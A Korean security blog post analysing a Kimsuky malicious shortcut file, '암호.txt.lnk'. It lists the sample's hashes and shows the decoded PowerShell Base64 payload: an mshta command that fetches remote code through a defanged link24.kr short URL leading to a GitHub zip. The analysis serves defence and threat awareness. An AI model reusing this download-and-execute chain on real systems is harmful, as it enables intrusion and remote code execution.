오늘은 북한 해킹 단체인 김수키(Kimsuky) 에서 만든 악성코드-암호.txt.lnk 에 대해 글을 적어 보겠습니다. 이번 악성코드는 분석은 너무 날로 먹는 느낌인 악성코드입니다.
파일명: 암호.txt.lnk
사이즈:1 MB
MD5:8506cedb51cd59e549c41ccada365ede
SHA-1:5787d8c9543acffceddbc76df95801e1ff96d847
SHA-256:46772972037abd7eba98599a759a8560d503d035b48ab3560bda2044e052ea91
입니다.
악성코드 분석
1.-e 옵션
PowerShell 사용을 해서 -e를 사용을 하고 뒤에 붙은 Base64 실행을 합니다.
2. Base64 디코딩 결과
UTF-16LE로 디코딩:
mshta "hxxps://link24(.)kr/1(v)qmB8"
사용자가 파일을 실행했다고 하면
1.PowerShell 실행
2.Base64 디코딩
3.다음 명령 실행:
mshta 를 이용을 해서 단축 주소를 사용해서 깃헙으로 이동을 하고 어떤 압축 파일을 다운로드 하는데 그것이 404 라는 모르겠음
hxxps://github(.)com/jensonhwang/studious-octo-system/releases/download/v1.0.0/pwko(.)zip?v=698e(b)d433e56d2(.)13316218
mshta.exe
Windows 기본 내장 프로그램
HTA(HTML Application) 실행 도구
요즈음 북한 애들 보니까 링크 24가지고 단축주소 사용을 하는 것이 종종 보임. 어차피 해당 단축주소 변환 사이트는 한국에 있으므로 경찰 분들이 알아서 하겠지만…. 아무튼, 이런 방법도 사용하고 있으니 주의하시는 걸로….
'소프트웨어 팁 > 보안 및 분석' 카테고리의 다른 글
| 김수키(Kimsuky) 코인 실전 트레이딩 핵심 비법서로 위장한 악성코드-실전 트레이딩 핵심 비법서.pdf.lnk (0) | 2026.02.20 |
|---|---|
| Kimsuky(김수키)과태료 부과 사전 통지서 로 위장한 악성코드-IPSInvoice.chm (0) | 2026.02.16 |
| 김수키(Kimsuky) 통일 연구원 사칭 악성코드 분석-2026_0212_1281232903482939_참고자료.lnk (0) | 2026.02.14 |
| 마이크로소프트 윈도우 11 메모장 취약점 수정 (0) | 2026.02.14 |
| 윈도우 10 KB5075912,윈도우 11 KB5077181,KB5075941 보안 업데이트 (0) | 2026.02.12 |
| 독일 고위 인사 표적 시그널 계정 탈취 경고 (0) | 2026.02.07 |
| 코니(Konni) 에서 만든 네이버 로그인 사칭 악성코드-210930-001.png.lnk (0) | 2026.02.06 |
| 프랑스 검찰, X사 사무실 압수수색 및 그록 딥페이크 관련 머스크 소환 (0) | 2026.02.05 |
